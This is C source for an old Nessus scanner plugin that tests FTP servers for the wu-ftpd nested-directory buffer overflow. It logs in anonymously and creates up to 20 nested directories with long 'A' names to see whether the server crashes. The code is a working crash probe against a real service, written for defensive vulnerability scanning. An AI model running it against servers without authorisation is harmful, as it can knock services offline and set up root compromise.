/*
 * This plugin was written by Renaud Deraison and is distributed
 * under the GPL
 */
#include <includes.h>

#define NAME "wu-ftpd overflow"
#define DESCRIPTION "\
There is a general class of vulnerability that exists in several\n\
popular ftp servers.  Due to insufficient bounds checking, it is\n\
possible to subvert an ftp server by corrupting its internal stack\n\
space.  By supplying carefully designed commands to the ftp server,\n\
intruders can force the the server to execute arbitrary commands with\n\
root privilege.\n\n\
The problem lies in the creation of several directories each inside\n\
each other. Nessus will try to create as many directories as possible,\n\
trying to crash the remote FTP server.\n\
Risk factor : High"


#define COPYRIGHT "this plugin is distributed under the GPL"
#define SUMMARY "ftpd buffer overflow"




PlugExport int plugin_init(struct arglist * desc);
PlugExport int plugin_init(struct arglist * desc)
{
  plug_set_name(desc, NAME);
  plug_set_description(desc, DESCRIPTION);
  plug_set_summary(desc, SUMMARY);
  plug_set_copyright(desc, COPYRIGHT);
  plug_set_category(desc, ACT_ATTACK);
  plug_set_family(desc, "Gain root remotely");
  plug_set_dep(desc, "find_service.nes");
  plug_set_dep(desc, "ftp_anonymous.nes");
  plug_set_dep(desc, "ftp_write_dirs.nes");
  return(0);
}


PlugExport int plugin_run(struct arglist * env);
PlugExport int plugin_run(struct arglist * env)
{
 int soc;
 int flag = 0;
 int port = (int)plug_get_key(env, "Services/ftp");
 char * rem_dir;
 signal(SIGPIPE, SIG_IGN);
 if(!port)port = 21;
 if(!plug_get_key(env, "ftp/anonymous_access"))return(0);
 if(!(rem_dir = plug_get_key(env, "ftp/writeable_dir")))return(0);
 if(host_get_port_state(env, port)<=0)return(0);
 if((soc = open_sock_tcp(env, port))<0)return(0);
 if(ftp_log_in(soc, "anonymous", "joe@"))return(0);
 if(cwd(soc, rem_dir)>=0)
 {
  char * a = emalloc(255);
  int flag = 0;
  int i = 0;
  memset(a, 'A', 249);
  while(!flag && i<20)
  {
   flag = mkd(soc, a);
   if(!flag)flag = cwd(soc, a);
   i++;
  }
  efree(&a);
 if(flag)
 {
  post_hole(env, port, "\
The remote FTP server appears to be vulnerable\n\
to the wu-ftpd overflow bug (create a lot of directories\n\
each inside each other) which can lead to a root \n\
compromise\n\
Fix : upgrade to the latest version");  
 }
 }
}

int
cwd(soc, dir)
 int soc;
 char * dir;
{
 int ret = 0;
 char * command = emalloc(strlen(dir)+100);
 sprintf(command, "CWD %s\n", dir);
 send(soc, command, strlen(command), 0);
 bzero(command, strlen(command));
 recv(soc, command, strlen(dir)+99, 0);
 if(!strlen(command))ret++;
 efree(&command);
 return(ret);
}


int
mkd(soc, dir)
 int soc;
 char * dir;
{
 int ret = 0;
 char * command = emalloc(strlen(dir)+100);
 sprintf(command, "MKD %s\n", dir);
 send(soc, command, strlen(command), 0);
 bzero(command, strlen(command));
 recv(soc, command, strlen(dir)+99, 0);
 if(!strlen(command))ret++;
 efree(&command);
 return(ret);
}

/*
int pwd(soc)
 int soc;
{
 int ret = 0;
 char * command = emalloc(4096);
 sprintf(command, "PWD\n");
 send(soc, command, strlen(command), 4);
 bzero(command, strlen(command));
 recv(soc, command, 4095, 0);
 printf("pwd)recu : %s\n", command);
 if(!strlen(command))ret++;
 efree(&command);
 return(ret);
}
*/



